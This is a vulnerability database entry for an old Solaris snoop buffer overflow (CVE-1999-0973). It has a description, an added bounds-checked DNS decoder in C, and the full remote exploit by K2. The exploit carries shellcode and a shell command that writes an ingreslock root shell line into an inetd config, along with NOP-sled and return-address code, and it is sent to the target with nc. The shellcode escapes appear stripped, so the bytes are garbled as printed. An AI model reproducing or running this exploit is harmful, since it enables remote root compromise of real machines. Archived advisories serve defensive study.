Solaris snoop (print_domain_name) Buffer Overflow Vulnerability

Vulnerability ID 1105638 Vulnerability type Buffer overflow
Published 1999-12-07 Updated 2005-05-02
CVE ID CVE-1999-0973
CNNVD-ID CNNVD-199912-035
Platform Solaris CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/19663
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-035
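|Vulnerability details
The Solaris snoop program contains a buffer overflow vulnerability. A remote attacker can gain root privileges by means of a long domain name when snoop is running in verbose mode.
|Exploit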
source: http://www.securityfocus.com/bid/858/info

If a Solaris machine is running snoop in verbose mode, it may be possible to compromise its security remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. Arbitrary code executed this way would run with the privileges of the user running snoop, which is root.
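For contrast with the unchecked copy described above, here is a bounds-checked DNS name decoder. It is an added example, not snoop's source and not part of the original advisory. The function name, the constants and the pointer-jump limit are assumptions; the sample packet is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DNS_MAX_NAME  255   /* RFC 1035: whole name, in octets */
#define DNS_MAX_LABEL 63    /* RFC 1035: single label */
#define DNS_MAX_JUMPS 16    /* assumed cap on compression pointers */

/* Decode the DNS name at msg[off] into out (outlen bytes, NUL-terminated).
 * Returns the decoded length, or -1 if the name is malformed, too long,
 * or would not fit in out. Hypothetical helper, not snoop's code. */
int decode_dns_name(const uint8_t *msg, size_t msglen, size_t off,
                    char *out, size_t outlen)
{
    size_t used = 0;
    int jumps = 0;

    if (outlen == 0) return -1;
    for (;;) {
        if (off >= msglen)
            return -1;                      /* read past end of packet */
        uint8_t len = msg[off++];
        if (len == 0)
            break;                          /* root label: end of name */
        if ((len & 0xC0) == 0xC0) {         /* compression pointer */
            if (off >= msglen || ++jumps > DNS_MAX_JUMPS)
                return -1;                  /* truncated or looping */
            off = ((size_t)(len & 0x3F) << 8) | msg[off];
            continue;
        }
        if (len > DNS_MAX_LABEL || off + len > msglen)
            return -1;                      /* bad label length */
        /* reserve room for a '.' separator and the terminating NUL */
        if (used + len + 1 > DNS_MAX_NAME || used + len + 2 > outlen)
            return -1;                      /* would overflow: reject */
        if (used > 0)
            out[used++] = '.';
        memcpy(out + used, msg + off, len);
        used += len;
        off += len;
    }
    out[used] = '\0';
    return (int)used;
}

int main(void) {
    /* constructed sample: "www.example.com" in DNS wire format */
    static const uint8_t pkt[] = "\3www\7example\3com";
    char name[1024];
    return decode_dns_name(pkt, sizeof pkt, 0, name, sizeof name) == 15 ? 0 : 1;
}
```

A caller that gets -1 should print a placeholder such as "(malformed name)" instead of the partial buffer.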

/* 
   by: K2,
   version .2
   this is a funny Solaris.
   remote Solaris 2.7 x86 snoop exploit
   rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
   
   run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop"
   
   verified with patch 108483-01
   
   thx str/horizon for shellcodes.  Hi plageuz
   Hi mom.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"xEBx37x5Ex8Dx5Ex10x89x1Ex83xC3x08x89"
"x5Ex04x83xC3x03x89x5Ex08x83xEBx0Bx8D"
"x0Ex89xCAx33xC0x89x46x0Cx89x46xF5x89"
"x46xFAx88x46x17x88x46x1AxB0x3Bx52x51"
"x53x50x9Ax73x74x72x6Ex07x72xE8xC4xFF"
"xFFxFFx31x33x20x4Ax61x6Ex20x31x39x39"
"x38x2Dx2Dx73x74x72x2Fx62x69x6Ex2Fx73"
"x68x28x2Dx63x29 echo w00w00;echo "ingreslock" 
"stream tcp nowait root /bin/sh sh -i" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";


#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;
char buffer[SIZE];

int main (int argc, char *argv[]) {
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    fprintf(stderr,"0x%lx\n",esp+offset);
    printf("%s", buffer);

    return 0;
}
|References

Source: BID
Name: 858
Link: http://www.securityfocus.com/bid/858
